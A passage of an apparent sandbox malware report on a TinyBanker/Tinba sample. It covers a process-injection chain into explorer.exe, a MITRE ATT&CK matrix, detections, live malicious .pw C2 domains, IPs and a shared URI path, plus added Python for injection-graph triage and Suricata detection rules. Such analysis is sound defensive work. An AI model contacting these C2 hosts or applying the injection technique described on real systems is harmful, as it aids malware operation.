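    "Source: explorer.exe, 00000003.00000002.2921450784.00000000018A1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman",
    "Source: winver.exe, 00000002.00000002.2893231988.0000000002C7C000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: tShell_TrayWnd*(d",
]

MEM_RE = re.compile(r"^Source:\s*(?P<src>.+?\.exe)\s*Memory written:\s*(?P<dst>.+?\.exe)\s*base:\s*(?P<base>[0-9A-Fa-f]+)")
PROC_RE = re.compile(r"^Source:\s*(?P<src>.+?\.exe)\s*Process created:\s*(?P<dst>.+?\.exe)")
STR_RE = re.compile(r"^Source:\s*(?P<src>[^,\s]+?\.exe),.*Binary or memory string:\s*(?P<value>.*)$")

# Window classes owned by explorer.exe (taskbar and desktop). FindWindow on either,
# then GetWindowThreadProcessId, is a common way for an injector to get explorer's PID.
EXPLORER_WINDOW_CLASSES = ("Shell_TrayWnd", "Progman")


def parse(lines):
    """Turn report lines into event dicts; lines of other kinds are ignored."""
    events = []
    for line in lines:
        if m := MEM_RE.match(line):
            events.append({"kind": "write", "src": m["src"], "dst": m["dst"], "base": int(m["base"], 16)})
        elif m := PROC_RE.match(line):
            events.append({"kind": "create", "src": m["src"], "dst": m["dst"]})
        elif m := STR_RE.match(line):
            events.append({"kind": "string", "src": m["src"], "value": m["value"]})
    return events


def image_name(path):
    return path.rsplit("\\", 1)[-1].lower()


def is_system_image(path):
    # Heuristic for this example: anything under the Windows directory is "system".
    return path.lower().startswith("c:\\windows\\")


def injection_graph(events):
    """Edges src -> dst for every write or process creation, keyed by image name."""
    graph = defaultdict(set)
    for e in events:
        if e["kind"] in ("write", "create"):
            graph[image_name(e["src"])].add(image_name(e["dst"]))
    return dict(graph)


def regions_written(events):
    """Distinct base addresses written into each target; several separate regions
    in one target points at more than a single patched pointer."""
    regions = defaultdict(set)
    for e in events:
        if e["kind"] == "write":
            regions[image_name(e["dst"])].add(e["base"])
    return {k: sorted(v) for k, v in regions.items()}


def suspicious_writes(events):
    """Writes by a process from the Windows directory into a process whose image
    lives elsewhere: here winver.exe and explorer.exe acting as injection hosts."""
    return [e for e in events if e["kind"] == "write"
            and is_system_image(e["src"]) and not is_system_image(e["dst"])]


def chain_from(root, graph):
    """Depth-first walk from root, giving the injection chain in order."""
    order, stack = [], [root]
    while stack:
        node = stack.pop()
        if node not in order:
            order.append(node)
            stack.extend(sorted(graph.get(node, ()), reverse=True))
    return order


def explorer_locator_hints(events):
    return sorted({cls for e in events if e["kind"] == "string"
                   for cls in EXPLORER_WINDOW_CLASSES if cls in e["value"]})


EVENTS = parse(LINES)

if __name__ == "__main__":
    print(" -> ".join(chain_from("java.exe", injection_graph(EVENTS))))
    for target, bases in regions_written(EVENTS).items():
        print(f"{target}: {len(bases)} distinct region(s), first at {bases[0]:#x}")
    print(len(suspicious_writes(EVENTS)), "cross-directory writes;",
          "explorer window classes seen:", explorer_locator_hints(EVENTS))
```

On this report's lines the walk from java.exe yields java.exe -> winver.exe -> qqqdbrylxafmy.exe, nine distinct regions are written into the Program Files target and one into bin.exe, and all eleven write events come from a Windows-directory process into an image outside it.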
MITRE ATT&CK Matrix (a technique that matched signatures carries the count shown in the report in parentheses; the remaining entries are the matrix's unmatched cells)

Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application
Execution: Exploitation for Client Execution (1), Scheduled Task/Job, At, Cron, Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job, Command and Scripting Interpreter
Persistence: Registry Run Keys / Startup Folder (11), DLL Side-Loading (1), Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job, At
Privilege Escalation: Process Injection (512), Registry Run Keys / Startup Folder (11), DLL Side-Loading (1), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job, At
Defense Evasion: Rootkit (3), Masquerading (1), Virtualization/Sandbox Evasion (1), Process Injection (512), Deobfuscate/Decode Files or Information (1), Hidden Files and Directories (1), Obfuscated Files or Information (21), Software Packing (1), DLL Side-Loading (1)
Credential Access: Credential API Hooking (1), LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem, /etc/passwd and /etc/shadow
Discovery: Security Software Discovery (111), Virtualization/Sandbox Evasion (1), Process Discovery (3), Application Window Discovery (1), File and Directory Discovery (1), System Information Discovery (111), Remote System Discovery, System Owner/User Discovery, Network Sniffing
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services, Direct Cloud VM Connections
Collection: Credential API Hooking (1), Archive Collected Data (11), Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking, Data Staged
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Command and Control: Encrypted Channel (21), Ingress Tool Transfer (1), Non-Application Layer Protocol (2), Application Layer Protocol (13), Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol, Web Protocols
Network Effects: Exploit SS7 to Redirect Phone Calls/SMS, SIM Card Swap
Remote Service Effects: Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups
Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement, Internal Defacement
Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless, Malvertising
Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies, Network Topology
Behavior Graph
Behavior Graph ID: 1366396 | Sample: java.exe | Start date: 22/12/2023 | Architecture: WINDOWS | Score: 100
Legend (graph icons, not reproduced here): Process, Signature, Created File, DNS/IP Info, Is Dropped, Is Windows Process, Number of created Registry Values, Number of created Files, Visual Basic, Delphi, Java, .Net C# or VB.NET, C, C++ or other language, Is malicious, Internet. Numbers in square brackets after a process name are the per-node counters drawn in the graph.

Start
  DNS/IP: xtbbpqfrsubt.pw; wwgfyvvdtmeq.pw; 12 other IPs or domains
  Signatures: Snort IDS alert for network traffic; Antivirus detection for URL or domain; Antivirus / Scanner detection for submitted sample; 6 other signatures
  java.exe [1] (started)
    Signatures: Exploit detected, runtime environment starts unknown processes; Writes to foreign memory regions
    winver.exe [1 4] (started)
      DNS/IP: fkmmvfeonnyh.pw 216.218.185.162, ports 49735, 49737, 49738, HURRICANEUS, United States; uyhgqunqkxnx.pw 45.77.249.79, ports 49736, 80, AS-CHOOPAUS, United States
      Dropped: C:\Users\user\AppData\Roaming\...\bin.exe, PE32
      Signatures: Creates autostart registry keys with suspicious names; Contains functionality to inject threads in other processes; Injects code into the Windows Explorer (explorer.exe); 4 other signatures
      explorer.exe [17 8] (injected)
        Signatures: Contains functionality to inject threads in other processes; Writes to foreign memory regions; Creates a thread in another existing process (thread injection)
        bin.exe [1] (started)
          Signatures: Antivirus detection for dropped file; Machine Learning detection for dropped file
          conhost.exe (started)
        bin.exe [1] (started)
          conhost.exe (started)
      SearchApp.exe [13] (injected)
        DNS/IP: 173.222.162.32, ports 443, 49729, AKAMAI-ASUS, United States
      sihost.exe (injected)
      32 other processes (injected)
    conhost.exe (started)

Screenshots (thumbnails not reproduced)

Initial Sample
Source | Detection | Scanner | Label
java.exe | 89% | ReversingLabs | Win32.Downloader.TinyBanker
java.exe | 100% | Avira | HEUR/AGEN.1322420
java.exe | 100% | Joe Sandbox ML |

Dropped Files
Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\F90F00A9\bin.exe | 100% | Avira | HEUR/AGEN.1322420
C:\Users\user\AppData\Roaming\F90F00A9\bin.exe | 100% | Joe Sandbox ML |

Unpacked PE Files: No Antivirus matches

Domains: No Antivirus matches
URLs
Source | Detection | Scanner | Label
https://aefd.nelreports.net/api/report?cat=bingaotak | 0% | URL Reputation | safe
https://simpleflying.com/how-do-you-become-an-air-traffic-controller/ | 0% | URL Reputation | safe
https://%s.xboxlive.com | 0% | URL Reputation | safe
https://aefd.nelreports.net/api/report?cat=bingrms | 0% | URL Reputation | safe
https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img | 0% | URL Reputation | safe
https://outlook.com_ | 0% | URL Reputation | safe
https://powerpoint.office.comcember | 0% | URL Reputation | safe
http://schemas.micro | 0% | URL Reputation | safe
https://login.windows.local | 0% | URL Reputation | safe
http://evbsdqvgmpph.pw/EiDQjNbWEQ/ | 100% | Avira URL Cloud | malware
http://fccfxejgtpqb.pw/EiDQjNbWEQ/ | 100% | Avira URL Cloud | malware
http://xtbbpqfrsubt.pw/EiDQjNbWEQ/ | 100% | Avira URL Cloud | malware
http://wwgfyvvdtmeq.pw/EiDQjNbWEQ/ | 100% | Avira URL Cloud | malware
http://mfueeimvyrsp.pw/EiDQjNbWEQ/ | 100% | Avira URL Cloud | malware
https://assets.activity.windows.comer | 0% | Avira URL Cloud | safe
https://mths.be/fromcodepoint | 0% | Avira URL Cloud | safe
http://spaines.pw/EiDQjNbWEQ/ | 100% | Avira URL Cloud | malware
https://powerpoint.office.comxee | 0% | Avira URL Cloud | safe
https://www.ng.com | 0% | Avira URL Cloud | safe
http://uyhgqunqkxnx.pw/EiDQjNbWEQ/ | 100% | Avira URL Cloud | malware
https://xsts.auth.xboxlive.comm | 0% | Avira URL Cloud | safe
http://cmnsgscccrej.pw/EiDQjNbWEQ/ | 100% | Avira URL Cloud | malware
https://assets.activity.windows.coms | 0% | Avira URL Cloud | safe
https://aefd.nelreports.net/api/report?cat=wsb | 0% | Avira URL Cloud | safe
https://excel.office.comcp | 0% | Avira URL Cloud | safe
https://activity.windows.comt | 0% | Avira URL Cloud | safe
http://fkmmvfeonnyh.pw/EiDQjNbWEQ/ | 100% | Avira URL Cloud | malware
http://gfnlmtcolrrb.pw/EiDQjNbWEQ/ | 100% | Avira URL Cloud | malware
http://vcklmnnejwxx.pw/EiDQjNbWEQ/ | 100% | Avira URL Cloud | malware
https://login.windows.local/ | 0% | Avira URL Cloud | safe
Contacted Domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
vcklmnnejwxx.pw | 216.218.185.162 | true | true | - | unknown
mfueeimvyrsp.pw | 216.218.185.162 | true | true | - | unknown
wwgfyvvdtmeq.pw | 216.218.185.162 | true | true | - | unknown
fccfxejgtpqb.pw | 216.218.185.162 | true | true | - | unknown
cmnsgscccrej.pw | 216.218.185.162 | true | true | - | unknown
vrmtybxxpddg.pw | 216.218.185.162 | true | true | - | unknown
utmyhnffxpcj.pw | 216.218.185.162 | true | true | - | unknown
xtbbpqfrsubt.pw | 216.218.185.162 | true | true | - | unknown
gfnlmtcolrrb.pw | 216.218.185.162 | true | true | - | unknown
uyhgqunqkxnx.pw | 45.77.249.79 | true | true | - | unknown
spaines.pw | 216.218.185.162 | true | true | - | unknown
evbsdqvgmpph.pw | 216.218.185.162 | true | true | - | unknown
fkmmvfeonnyh.pw | 216.218.185.162 | true | true | - | unknown
rvqlfnedcldh.pw | unknown | unknown | true | - | unknown
Contacted URLs
Name | Malicious | Antivirus Detection | Reputation
http://evbsdqvgmpph.pw/EiDQjNbWEQ/ | true | Avira URL Cloud: malware | unknown
http://fccfxejgtpqb.pw/EiDQjNbWEQ/ | true | Avira URL Cloud: malware | unknown
http://uyhgqunqkxnx.pw/EiDQjNbWEQ/ | true | Avira URL Cloud: malware | unknown
http://spaines.pw/EiDQjNbWEQ/ | true | Avira URL Cloud: malware | unknown
http://xtbbpqfrsubt.pw/EiDQjNbWEQ/ | true | Avira URL Cloud: malware | unknown
http://wwgfyvvdtmeq.pw/EiDQjNbWEQ/ | true | Avira URL Cloud: malware | unknown
http://cmnsgscccrej.pw/EiDQjNbWEQ/ | true | Avira URL Cloud: malware | unknown
http://mfueeimvyrsp.pw/EiDQjNbWEQ/ | true | Avira URL Cloud: malware | unknown
http://gfnlmtcolrrb.pw/EiDQjNbWEQ/ | true | Avira URL Cloud: malware | unknown
http://vcklmnnejwxx.pw/EiDQjNbWEQ/ | true | Avira URL Cloud: malware | unknown
http://fkmmvfeonnyh.pw/EiDQjNbWEQ/ | true | Avira URL Cloud: malware | unknown
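The Contacted Domains and Contacted URLs tables above show thirteen 12-letter .pw names plus spaines.pw, twelve of them resolving to 216.218.185.162, one to 45.77.249.79, one unresolved, and every contacted URL requesting the same path /EiDQjNbWEQ/. The Python below is an added example, not part of the Joe Sandbox report, that turns those two tables (transcribed inline as constructed input) into a hunting view: it clusters names by resolved IP, separates generated-looking names from hard-coded ones, checks a URL against the set, and emits Suricata rules for the shared path and the domains. The 12-letter heuristic, the rule messages and the SID range are this example's own assumptions.

```python
"""Added network-IOC triage for this report, not part of the Joe Sandbox output:
clusters the contacted domains by resolved IP, separates generated-looking names
from hard-coded ones, and emits Suricata rules for the shared C2 URI path."""
from urllib.parse import urlsplit

# Constructed input transcribed from the Contacted Domains table: (name, IP or None).
DOMAINS = [
    ("vcklmnnejwxx.pw", "216.218.185.162"), ("mfueeimvyrsp.pw", "216.218.185.162"),
    ("wwgfyvvdtmeq.pw", "216.218.185.162"), ("fccfxejgtpqb.pw", "216.218.185.162"),
    ("cmnsgscccrej.pw", "216.218.185.162"), ("vrmtybxxpddg.pw", "216.218.185.162"),
    ("utmyhnffxpcj.pw", "216.218.185.162"), ("xtbbpqfrsubt.pw", "216.218.185.162"),
    ("gfnlmtcolrrb.pw", "216.218.185.162"), ("uyhgqunqkxnx.pw", "45.77.249.79"),
    ("spaines.pw", "216.218.185.162"), ("evbsdqvgmpph.pw", "216.218.185.162"),
    ("fkmmvfeonnyh.pw", "216.218.185.162"), ("rvqlfnedcldh.pw", None),
]
# Constructed input transcribed from the Contacted URLs table.
URLS = [f"http://{h}/EiDQjNbWEQ/" for h in (
    "evbsdqvgmpph.pw", "fccfxejgtpqb.pw", "uyhgqunqkxnx.pw", "spaines.pw",
    "xtbbpqfrsubt.pw", "wwgfyvvdtmeq.pw", "cmnsgscccrej.pw", "mfueeimvyrsp.pw",
    "gfnlmtcolrrb.pw", "vcklmnnejwxx.pw", "fkmmvfeonnyh.pw")]


def cluster_by_ip(domains):
    """Group names by the address they resolved to; one IP fronting a dozen
    throwaway names is the shape of a shared C2 server behind rotating domains."""
    clusters = {}
    for name, ip in domains:
        clusters.setdefault(ip, []).append(name)
    return clusters


def looks_generated(name):
    """Heuristic, not a signature: one 12-letter lowercase label under .pw, the
    shape every name in this report shares except spaines.pw."""
    label, _, tld = name.rpartition(".")
    return tld == "pw" and len(label) == 12 and label.isalpha() and label.islower()


def shared_uri_path(urls):
    """The single path all contacted URLs use, or None if they differ."""
    paths = {urlsplit(u).path for u in urls}
    return next(iter(paths)) if len(paths) == 1 else None


def matches_c2(url, domains, path):
    """True if the URL hits a known host or reuses the C2 path on a new host
    (the path check is what catches a domain this run never resolved)."""
    parts = urlsplit(url)
    return parts.hostname in {name for name, _ in domains} or parts.path == path


def suricata_rules(domains, path, base_sid=9000000):
    """Suricata 5+ syntax; base_sid is a placeholder to replace with a local SID range."""
    rules = [f'alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"Tinba C2 URI path"; '
             f'flow:established,to_server; http.uri; content:"{path}"; startswith; '
             f'classtype:trojan-activity; sid:{base_sid}; rev:1;)']
    for i, (name, _) in enumerate(domains, start=1):
        rules.append(f'alert dns $HOME_NET any -> any any (msg:"Tinba C2 domain {name}"; '
                     f'dns.query; content:"{name}"; nocase; endswith; '
                     f'classtype:trojan-activity; sid:{base_sid + i}; rev:1;)')
    return rules


if __name__ == "__main__":
    for ip, names in cluster_by_ip(DOMAINS).items():
        print(f"{ip or 'unresolved'}: {len(names)} domain(s)")
    print("hard-coded-looking:", [n for n, _ in DOMAINS if not looks_generated(n)])
    print("shared path:", shared_uri_path(URLS))
    print("\n".join(suricata_rules(DOMAINS, shared_uri_path(URLS))[:2]))
```

The path rule is the more durable of the two kinds: the domain list covers only the names this run resolved, while the path check also flags rvqlfnedcldh.pw, which appears in the Domains table with no IP, and any further name that reuses /EiDQjNbWEQ/.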
URLs from Memory and Binaries
Name | Source | Malicious | Antivirus Detection | Reputation
https://aka.ms/odirmr | explorer.exe, 00000003.00000000.1636127493.00000000079FB000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000003.00000002.2975916744.00000000079FB000.00000004.00000001.00020000.00000000.sdmp | false | - | high
https://assets.activity.windows.com/v1/assets | svchost.exe, 00000005.00000002.2907008745.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp; svchost.exe, 00000005.00000000.1714381693.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp | false | - | high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV | explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | - | high
https://api.msn.com:443/v1/news/Feed/Windows? | explorer.exe, 00000003.00000002.3032615601.00000000097D4000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000003.00000000.1637966604.00000000097D4000.00000004.00000001.00020000.00000000.sdmp | false | - | high
https://www.msn.com/news?OCID=WSB_QS_NE&PC=wsbmsnqs | SearchApp.exe, 0000000B.00000000.1766890934.0000024B44184000.00000004.00000001.00020000.00000000.sdmp | false | - | high
https://aefd.nelreports.net/api/report?cat=bingaotak | SearchApp.exe, 0000000B.00000000.1749414495.000002434119B000.00000004.00000001.00020000.00000000.sdmp; SearchApp.exe, 0000000B.00000000.1761686627.0000024B4239F000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://excel.office.com | explorer.exe, 00000003.00000000.1640019930.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000003.00000002.3058572833.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | false | - | high
https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we | explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | - | high
https://simpleflying.com/how-do-you-become-an-air-traffic-controller/ | explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://outlook.office.com/M365.Access | SearchApp.exe, 0000000B.00000000.1774346407.0000024B447CF000.00000004.00000001.00020000.00000000.sdmp | false | - | high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY | explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | - | high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark | explorer.exe, 00000003.00000000.1636127493.00000000078AD000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000003.00000002.2975916744.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | false | - | high
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe | explorer.exe, 00000003.00000000.1640019930.000000000C893000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000003.00000002.3058572833.000000000C893000.00000004.00000001.00020000.00000000.sdmp | false | - | high
https://substrate.office.com/SubstrateSearch-Internal.ReadWriteO | SearchApp.exe, 0000000B.00000000.1810169868.0000024B55259000.00000004.00000001.00020000.00000000.sdmp | false | - | high
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg | explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | - | high
http://www.autoitscript.com/autoit3/J | explorer.exe, 00000003.00000002.3058572833.000000000C964000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000003.00000000.1640019930.000000000C964000.00000004.00000001.00020000.00000000.sdmp | false | - | high
https://wns.windows.com/L | explorer.exe, 00000003.00000000.1640019930.000000000C557000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000003.00000002.3058572833.000000000C557000.00000004.00000001.00020000.00000000.sdmp | false | - | high
https://word.office.com | explorer.exe, 00000003.00000000.1640019930.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000003.00000002.3058572833.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp; StartMenuExperienceHost.exe, 00000009.00000000.1726328708.000001B981425000.00000004.00000001.00020000.00000000.sdmp; StartMenuExperienceHost.exe, 00000009.00000002.2904840792.000001B981425000.00000004.00000001.00020000.00000000.sdmp | false | - | high
https://outlook.live.com/owa | SearchApp.exe, 0000000B.00000000.1758577403.0000024B420F9000.00000004.00000001.00020000.00000000.sdmp | false | - | high
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings | explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | - | high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu | explorer.exe, 00000003.00000000.1636127493.00000000078AD000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000003.00000002.2975916744.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | false | - | high
https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win | explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | - | high
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew | explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | - | high
https://www.msn.com/finance?OCID=WSB_TL_FN&PC=wsbmsnqs | SearchApp.exe, 0000000B.00000000.1810169868.0000024B55240000.00000004.00000001.00020000.00000000.sdmp; SearchApp.exe, 0000000B.00000000.1766890934.0000024B44184000.00000004.00000001.00020000.00000000.sdmp | false | - | high
https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow- | explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | - | high
https://%s.xboxlive.com | svchost.exe, 00000005.00000002.2908871960.00000151A4A65000.00000004.00000001.00020000.00000000.sdmp; svchost.exe, 00000005.00000000.1714413408.00000151A4A65000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | low
https://outlook.com | StartMenuExperienceHost.exe, 00000009.00000000.1726392280.000001B9814D0000.00000004.00000001.00020000.00000000.sdmp; StartMenuExperienceHost.exe, 00000009.00000002.2908493718.000001B9814D0000.00000004.00000001.00020000.00000000.sdmp | false | - | high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu | explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | - | high
https://substrate.office.com | SearchApp.exe, 0000000B.00000000.1814959925.0000024B5542F000.00000004.00000001.00020000.00000000.sdmp; SearchApp.exe, 0000000B.00000000.1774416665.0000024B447D3000.00000004.00000001.00020000.00000000.sdmp | false | - | high
https://login.windows.net/ | svchost.exe, 00000005.00000000.1714465994.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp; svchost.exe, 00000005.00000002.2912066830.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp | false | - | high
https://substrate.office.com/search/api/v1/events?scenario= | SearchApp.exe, 0000000B.00000000.1810169868.0000024B55259000.00000004.00000001.00020000.00000000.sdmp | false | - | high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark | explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | - | high
https://www.rd.com/list/polite-habits-campers-dislike/ | explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | - | high
https://android.notify.windows.com/iOS | explorer.exe, 00000003.00000000.1640019930.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000003.00000002.3058572833.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | false | - | high
https://aefd.nelreports.net/api/report?cat=bingrms | SearchApp.exe, 0000000B.00000000.1757604184.0000024B41F45000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img | explorer.exe, 00000003.00000000.1636127493.00000000078AD000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000003.00000002.2975916744.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://powerpoint.office.comxee | StartMenuExperienceHost.exe, 00000009.00000000.1726328708.000001B981425000.00000004.00000001.00020000.00000000.sdmp; StartMenuExperienceHost.exe, 00000009.00000002.2904840792.000001B981425000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://outlook.com_ | explorer.exe, 00000003.00000000.1640019930.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000003.00000002.3058572833.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | low
https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe | explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | - | high
https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at | explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp; explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | - | high
https://fb.me/react-polyfillsThis | SearchApp.exe, 0000000B.00000000.1780439279.0000024B44916000.00000004.00000001.00020000.00000000.sdmp | false | - | high
https://xsts.auth.xboxlive.com/ | svchost.exe, 00000005.00000000.1714465994.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp; svchost.exe, 00000005.00000002.2912066830.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp | false | - | high
https://login.windows.net | svchost.exe, 00000005.00000000.1714465994.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp; svchost.exe, 00000005.00000002.2912066830.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp |
                                                                                                                high
                                                                                                                https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-clexplorer.exe, 00000003.00000002.2975916744.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://powerpoint.office.comcemberexplorer.exe, 00000003.00000000.1640019930.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3058572833.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  https://xsts.auth.xboxlive.comsvchost.exe, 00000005.00000000.1714465994.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2912066830.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1766426485.0000024B4402B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-explorer.exe, 00000003.00000000.1636127493.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2975916744.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://mths.be/fromcodepointSearchApp.exe, 0000000B.00000000.1854349272.0000024B5843A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      unknown
                                                                                                                      http://schemas.microexplorer.exe, 00000003.00000000.1638748938.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1636906084.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1637467440.0000000008720000.00000002.00000001.00040000.00000000.sdmp, RuntimeBroker.exe, 0000000A.00000002.2954695107.000001ECFC470000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
